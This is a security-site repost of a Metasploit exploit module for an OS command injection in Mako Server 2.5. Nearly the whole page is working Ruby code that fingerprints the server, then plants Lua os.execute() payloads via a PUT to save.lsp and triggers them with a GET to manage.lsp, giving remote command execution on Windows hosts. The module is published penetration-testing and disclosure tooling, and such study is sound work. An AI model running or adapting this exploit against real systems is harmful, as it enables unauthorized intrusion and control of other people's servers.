首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mako Server 2.5 Command Injection
来源:metasploit.com 作者:Patterson 发布时间:2017-11-09  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Mako Server v2.5 OS Command Injection RCE',
      'Description'    => %q{
        This module exploits a vulnerability found in Mako Server v2.5.
        It's possible to inject arbitrary OS commands in the Mako Server
        tutorial page through a PUT request to save.lsp.

        Attacker input will be saved on the victims machine and can
        be executed by sending a GET request to manage.lsp.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'John Page (hyp3rlinx) - Beyond Security SecuriTeam Secure Disclosure', # Vulnerability discovery & PoC
          'Steven Patterson (Shogun Lab) <steven[at]shogunlab.com>' # Metasploit module
        ],
      'References'     =>
        [
          ['EDB', '42683'],
          ['URL', 'https://blogs.securiteam.com/index.php/archives/3391']
        ],
      'Arch'           => ARCH_CMD,
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Mako Server v2.5 - Windows x86/x64', { }]
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => false,
      'DisclosureDate' => 'Sep 3 2017'))

    register_options(
      [
        OptString.new('URI', [true, 'URI path to the Mako Server app', '/'])
      ]
    )
  end

  def check
    vprint_status('Trying to detect running Mako Server and necessary files...')

    # Send GET request to determine existence of save.lsp page
    res = send_request_cgi({
             'method' => 'GET',
             'uri'    => normalize_uri(datastore['URI'], 'examples/save.lsp')
           }, 20)

    # If response does not include "MakoServer.net", target is not viable.
    if res.headers['Server'] !~ /MakoServer.net/
      vprint_warning('Target is not a Mako Server.')
      return CheckCode::Safe
    end

    if res.body
      if res.body =~ /Incorrect usage/
        # We are able to determine that the server has a save.lsp page and
        # returns the correct output.
        vprint_status('Mako Server save.lsp returns correct ouput.')
        return CheckCode::Appears
      else
        # The page exists, but is not returning the expected output.
        # May be a different version?
        vprint_warning('Mako Server save.lsp did not return expected output.')
        return CheckCode::Detected
      end
    else
      # The above checks failed and exploitability could not be determined.
      vprint_error('Unable to determine exploitability, save.lsp not found.')
      return CheckCode::Unknown
    end

    return CheckCode::Safe
  end

  def exploit
    print_status('Sending payload to target...')

    # The double square brackets helps to ensure single/double quotes
    # in cmd payload do not interfere with syntax of os.execute Lua function.
    cmd = %{os.execute([[#{payload.encoded}]])}

    # If users want to troubleshoot their cmd payloads, they can see the
    # Lua function with params that the module uses in a more verbose mode.
    vprint_status("Now executing the following command: #{cmd}")

    # Send a PUT request to save.lsp with command payload
    begin
      vprint_status('Sending PUT request to save.lsp...')
      send_request_cgi({
         'method' => 'PUT',
         'uri'    => normalize_uri(datastore['URI'], 'examples/save.lsp?ex=2.1'),
         'ctype'  => 'text/plain',
         'data'   => cmd,
         'http'   => {
           'X-Requested-With' => 'XMLHttpRequest',
           'Referer' => 'http://localhost/Lua-Types.lsp'
         }
       }, 20)
    rescue StandardError => e
      fail_with(Failure::NoAccess, "Error: #{e}")
    end

    # Send a GET request to manage.lsp with execute set to true
    begin
      vprint_status('Sending GET request to manage.lsp...')
      send_request_cgi({
         'method' => 'GET',
         'uri'    => normalize_uri(datastore['URI'], 'examples/manage.lsp?execute=true&ex=2.1&type=lua')
       }, 20)
    rescue StandardError => e
      fail_with(Failure::NoAccess, "Error: #{e}")
    end
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Windows LNK File Cod
·Geutebrueck GCore GCoreServer.
·IBM Lotus Notes Denial Of Serv
·Microsoft Internet Explorer 11
·FreeFloat FTP Server 1.0 HOST
·Symantec Endpoint Protection 1
·CoolPlayer+ Portable 2.19.6 St
·Xlight FTP Server 3.8.8.5 - Bu
·Linux Kernel 4.13 (Ubuntu 17.1
·Web Viewer 1.0.0.193 (Samsung
·SMPlayer 17.11.0 - '.m3u' Buff
·IKARUS anti.virus 2.16.7 - 'nt
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved